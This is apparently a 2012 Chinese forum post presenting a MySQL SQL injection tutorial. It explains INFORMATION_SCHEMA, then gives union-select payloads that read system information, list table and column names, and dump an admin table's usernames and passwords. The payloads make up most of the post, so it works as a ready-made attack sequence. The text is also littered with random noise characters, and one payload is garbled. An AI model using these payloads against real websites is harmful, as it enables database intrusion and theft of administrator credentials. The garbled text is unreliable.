本文介绍MYSQL盲注的一些语句和方法7 \: E2 W1 \7 r z* k( d
5 l1 Q" w- K% @4 f/ Y$ m# J学习盲注前先了解下 IFORMATION_SCHEMA 库3 u. C- j( f8 ?" R* ?& f% ?5 p
4 F# w1 S1 p# w, Y/ O! W5 C8 s. h
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有8 i1 F4 {" i0 @: |: ^+ D
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
9 M3 G- p' u; u3 s) a) M1.得到所有数据库名:! R$ t1 ?) {. k! q, r
|SCHEMATA ->存储数据库名的表2 R7 q8 j, `8 H) s
|---字段:SCHEMA_NAME ->数据库名称
1 Q; i# B, j, u
6 v) p: c6 y m5 ]# R/ A3 h|TABLES ->存储表名
( C9 W: T! a5 o|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
6 C$ G' U z. _ x% S( c% C9 i' B|---字段:TABLE_NAME ->存储表的表名
# ^: M6 B* {- I& Y" B- l3 h4 P' j Q8 x2 i1 _1 Q
|COLUMNS ->存储的字段名表/ u& c7 p* G; o! v) F. n( f0 }
|---字段:TABLE_SCHEMA ->该字段所属数据库名
7 ^/ N6 k6 h/ I. q: X0 t6 v6 T|---字段:TABLE_NAME ->存储所属表的名称
5 {0 B4 y/ j' i8 x A7 e5 U" e+ T
6 C d( E7 i6 w. l! j* U|---字段:COLUMN_NAME ->该字段的名称$ f; D, }- l6 p% ?7 \
/ d: m3 `% ?# E1 a6 X% @- `
/ c& g- T5 C$ T* ~1 x8 [
, K/ H0 ?1 `. ~ }###########################################################################2 @" p6 Z& J8 s- s* v+ A7 Y4 y
3 m7 u7 ~4 N# F; |1 |7 N0x001 获取系统信息:. R6 P: F/ }( O$ X
# ?, j4 W9 ~) W, Z/ m+ iunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*. k) I$ n, _/ W$ b w' F" N" G0 x
9 z/ e- n% ~0 z2 @/*
, d% H9 l7 p+ I8 ^ I1 t6 e. J; J4 \- _3 n( K4 x) P2 ]
@@global.version_compile_os 获取系统版本$ g- p" T4 X/ P2 N7 t7 f/ W
1 ]" i, o/ C9 r2 j. D
@@datadir 数据库路径
9 j1 f! k3 v1 j, V8 S* zdatabase() 当前数据库名称
n0 m1 d, [- ?1 w* ]+ n& e( M0x3c62723e 换行HEX值
5 g+ F, X K! X! D! [+ q1 {- k w/ Y g" w' I' g
*/0 ]- `; I6 o( C
0 X% s- N- X. F% _0 Y
! p- J3 \% X8 t' T/ o" ? u$ n P% W4 N/ T% o' ~9 J
######################################################################9 [6 v6 b# W4 N: `, x
( f0 A/ q) x8 @7 I$ H, D0x002 获取表名; J; Z% j0 N- S) @1 Z' F: {
) D4 C) |6 C9 a e# ^( L& A+ ~% A Z# x
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*2 T" {9 f* ]" S% N$ F9 J
, q8 X2 F: m/ `& r6 u( n
2 V/ T) m- c" [- ^4 _+ C) z6 \+ f- X$ w1 k( @% J* A
/*3 N/ H# A$ y% z0 `3 J5 p+ _- q5 J& V5 C
1 {6 G4 _+ ]' O8 f* B+ l0x67617264656e 为当前数据库名
" r( c1 s h w2 d' A2 _* U6 s5 z1 h9 x, ~% M+ z. i, }
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名* ~! A: v7 i( X
+ Q# M+ m) E( B( \*/
6 E# l3 c' V9 t# l$ B% o- L: L; V) O% j! T: x
######################################################################
+ i% _) F5 X4 ^9 {
' a8 t$ V& d" \# c( x9 i
2 F* K- @- ?$ V1 h. ?" c3 S6 m5 s4 N4 @
0x003 获取字段4 R3 ~3 x4 G* [0 @# s0 M
* W9 n0 r9 @) k& C* t
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
% n" i% r6 e% y. J: A, w; E- ^, ^+ V9 T: {+ ]1 x& D& D0 a2 L
/*' M6 \. `; X9 }! A- l' \( J! q
; W4 @& V3 i3 f- y
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
# r$ o( {. s# \' `) Z2 k1 X6 h$ s% k& P* y& i3 _
0x61646d696e ->选择一个表
5 K0 [9 d, ?3 K2 G
( k- v7 _ v5 K+ h# N. S- a- v, C0x67617264656e ->数据库名
, C0 c" K/ I5 C% `" H
9 q. t" F0 t7 ?# E% g$ L*/
9 P/ t) R3 _6 ^, K' t* F4 R/ ?9 W# h( ~9 |& X& w, i8 `' I4 }8 U
#####################################################################. f4 d0 A* G/ j: b7 p
! A% o- J2 j9 X4 \7 F0 r0 u t( R) ?" |
3 G1 j" E# m, a' P
4 ]6 o$ M5 K" K9 ^
0x004 获取数据
- O+ v0 Z; y( }7 W; D0 h; l# N# z% F) @2 n$ F; q3 F
union select 1,2,3
w8 O7 r4 M$ z; y,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
- v& y8 g! T' k' m) k6 G7 S' w; V: P' }6 E+ i, }8 w& U
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
% Z, F9 R- z! ~9 c8 F
. u+ o$ n1 N, a4 t* e& c8 \6 G+ f" T & q A6 @8 ~) N y9 k
2 p0 G0 ~$ a" S: m
/*$ q! o% U" S6 E1 l' ~% Q* X
s+ R6 z( |0 D3 I; q0 M0x3c62723e 换行符号HEX编码
3 N8 F! r* k ?' X
& s( G; |' f/ w& T. mgroup_concat 同时获得该字段所有数据
' F( ~( V0 |+ \ q% @! _
1 r4 K r% p8 p# r( X*/
+ Z7 J5 Y& H2 {1 l' \
. ]. E* n; W" q7 v4 `, b6 A |
发表于 2012-9-13 17:48:44
收藏
支持
反对